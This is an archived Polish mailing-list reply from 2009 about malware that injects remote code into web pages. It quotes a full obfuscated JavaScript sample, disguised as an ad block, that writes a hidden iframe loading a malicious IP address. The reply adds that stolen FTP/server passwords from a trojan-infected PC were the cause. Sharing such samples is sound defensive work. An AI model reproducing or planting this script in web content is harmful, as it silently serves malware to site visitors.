Re: [ mallware doklejajacy zdalnie kod do stron ]

Autor: <apocalyptiq_at_gmail.com>
Data: Wed 18 Feb 2009 - 16:00:22 MET
Message-ID: <fde3607b-5389-447b-a8dd-f055a0e7411b@v38g2000yqb.googlegroups.com>
Content-Type: text/plain; charset=ISO-8859-2

On Feb 18, 11:29 am, Matt Rutkowski <mat...@gmail.com> wrote:
> Nowa odmiana ktora dokleja sie
>
> ---[ kod ] --
>
> <!-- ad --><script>osoem=(4e0,190);
> johbc=(9e0,1909);
> arnrb=(65.,""+"a"+"m"+"e");
> vpkgs=(0x826," ");
> oymzl=(1.89e2<=656?"":5.);
> oozuk=(0x44>6?"17":2.934e3);
> aivuk=(4e0,""+".");
> rjreh=(5.4e1>0.3?"":.5);
> mnswd=(414>6.17e3?70.:"9");
> zlits=(5.5e1>1.5e1?".":46.);
> wlpwa=(9,"93");
> dmdcw=(1e1<.6495?278.:"las");
> bthvu=(0.900,"r");
> xwjcg=(0x4,"yl");
> wxvoe=(0.64<=0.1?.9:""+"i"+"s"+"");
> wafzv=(646>8.39e2?9518:"i");
> jfazq=(0x685>=8e1?""+"b"+"i"+"l"+"":4.3e1);
> ernzk=(.840>=2.?53.:"i"+"t"+"y"+"");
> yfnul=(8.51e2,":");
> skxws=(.448,"");
> vyrje=(0x6,"<");
> kylrc=(59,"/i");
> zllcn=(8483,""+"a"+"");
> oxynx=(9.6e1,""+"m"+"e"+"");
> elbis=(0x66<2002?"r":0x547);
> slnat=(7.07e2,"");
> onlvz=(9e0<0x54?"='":58);
> bljji=(6.,"ht");
> oowax=(9.3e1<=4?835.:"tp");
> vafut=(93>634.?6157.:":/");
> hswsd=(.3>=6.?33.:"");
> bwtwu=(0.9,"o");
> efesv=(0.8,"/");
> nczim=(8166>=3.495e3?"=":0.7);
> kkkka=(0x93,"2");
> btqpy=(.6," ");
> yxjvl=(9.,""+"");
> myfsk=(7,"");
> qcevo=(0x2<.350?.4:"h");
> lmiph=(.1055>=0.92?0.8:"i");
> fgjfd=(329,"d");
> onjpi=(9.84e2<=854.?0.7687:"e");
> ypdfc=(0.65<=42.?" "+"":.8318);
> claug=(0x3590,">");
> lpcpn=(7.7e1,"");
> nhbvb=(2,""+">");
> flrft=(0x9,5);
> irhwk=((93<=9893?.711:3)<=(0.9>=9.4e1?.569:3.692e3)?(.3<=1.2e1?osoem:
> 2.21e2):(4.>.3?.6:0.31));
> fyatw=((973.,0.5e1)<(3928.,.7689)?(5<=.532?.696:2e0):(5e0,johbc));
> nwyro=((7e0>=8.?3869.:0x2),(5.91e2>=0.957e3?0x2110:arnrb)+(0.5e1,vpkgs)
> +(.830>=9.8e1?.533:oymzl));
> xwuua=((7e0>=82.?.9357:7.),(1983.>=20.?"85"+"."+"":8352)+(6.35e2<0x2?
> 0x83:oozuk)+(1.2e1>0x4843?56:aivuk));
> kzxos=((.3727,5.06e2),(.727,rjreh)+(91,"1"+"3")+(6849.,mnswd)
> +(15.,zlits)+(4>.336?""+"1"+"":.2)+(0.68,wlpwa)+(.79,"/")+(.136,dmdcw)
> +(0x4<.5?.4:"the")+(6,bthvu)+(2.,""));
> kxotj=((3.08e2,0.7310),(0x2,xwjcg)+(7e0<=7.269e3?"e=":
> 5.106e3)+(2.,""+"'"+"v"+"")+(0x4<6e0?wxvoe:0x7616)+(.9511<=0x5251?
> wafzv:0.1902)+(2.807e3>2.1e1?jfazq:0x2)+(5588.>=2.?ernzk:
> 8.11e2)+(781>=0.2435?yfnul:67)+(.82,skxws));
> xynhe=((.58,1.266e3),(33>0x32?0x4312:vyrje)+(.6084<=957?kylrc:
> 0x2769)+(0.63,"fr")+(2e0,zllcn)+(6.,oxynx)+(426,""));
>
> aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3:6.427e3)?(0x1985,9389):
> (6e0,.825)),((0.229e3>=69.?4.562e3:3132)<=(66<=0x3?7e0:0x229)?
> (5217.,5e0):(376.>7.86e2?6.5e1:document)))[(((.82,0x6)<=(8130,.7246)?
> (4.7e1<.551?2:0.991):(0x9688>=781.?0.31:5.04e2)),((7.1e1>=.1?.
> 29:3.8e2),(382,"w")+(9865>=.2?elbis:13)+(.152>=0x452?0.363:""+"it"+"")
> +(5.<=8.1e1?"e":0x35)))]((((.6209,6193.),(1.2e1>=9?irhwk:2.89e2))<((.
> 70,.768)>(5.>=.8447?0x27:681.)?(9870,96.):(454,fyatw))?((0x5<7852?.
> 16:0.4)<=(1e0>1.173e3?0x9967:.3)?(0.3,"<ifr"):(.812<27.?58:1e0))+
> ((53.<=29.?1194.:0x9563),(0x961,nwyro))+((1631>88?0x578:7e1)>=(79>=.44?
> 0x107:6.07e2)?(.6,slnat)+(5.94e2,""+"s"+"")+(7.21e3>5e0?""+"r"+"c"+"":
> 0.509e3)+(84.<=185.?onlvz:193)+(.202,bljji)+(5.6e2<3365.?oowax:
> 1.8e1)+(338.<738.?vafut:0.5e1)+(0.1e1>=.21?"/":9e0)+(4.5e3>=1?hswsd:.
> 573):(.3<.272?60.:0.1))+((0x6,7.5e1),(986.<=36.?6.3e1:xwuua))+
> ((256>=57.?.89:8e0),(13.>0x7643?216.:kzxos))+((0.183>1?.20:.5705)<=
> (27>=3e0?.909:39)?(6506.,"")+(.794>=0.2?bwtwu:0x66)+(.39,"1")
> +(3.03e3,efesv)+(7.2e1>=0x79?0.202:"?")+(0x83,"t")+(0.3e1,nczim)
> +(1538.<=228.?0.9e1:kkkka)+(0.768>374.?348.:"'")+(1606.,btqpy)
> +(7.212e3,"s")+(0x8619,"t")+(3.>0x2864?8957:yxjvl):(.756>1221.?
> 932:6.672e3))+((653.,8.07e2)>=(.95<2.4e1?4e0:554)?(0x6291,kxotj):
> (4.9e1,9.))+((263<6.423e3?53.:8.24e2),(4>=0.13?myfsk:.6)+(238<0.6?
> 0x37:qcevo)+(.984>=0x2261?2.052e3:lmiph)+(.94,"d")+(7.845e3>=5?fgjfd:.
> 294)+(4e0,onjpi)+(4872.,"n")+(0.3754>.4?533:"'"+"")+(0.794e3>9487.?
> 4.8e1:ypdfc)+(5374.,claug)+(5.9e1,lpcpn))+((0.90,408.),(0x2<=5.041e3?
> xynhe:0x3))+((2.<1.328e3?377.:8e0)<(2.58e2,1e0)?(0x826<.4?0x436:.1):
> (4.2e1<8?0.88e2:nhbvb)):((5901>=.8159?flrft:9e0),(.4,8.933e3))));
>
> </script><!-- /ad -->
>
> ---[ kod ] --
>
> adres ktory wywoluje:
>
>  http://85.17.139.193/lasthero1/?t=2
>
> --
> Matt Rutkowski

U kolegi hasła do serwera, na którym nastąpiły te ataki, też było
zapisane :-) Po tym jak zeskanował kompa antywirem, wykryło mu
kilkadziesiąt wirusów, w tym trojany. Po ich usunięciu i zmianie hasła
na serwer, ataki ustały :-)
Received on Wed Feb 18 16:05:06 2009

To archiwum zostało wygenerowane przez hypermail 2.1.8 : Wed 18 Feb 2009 - 16:40:00 MET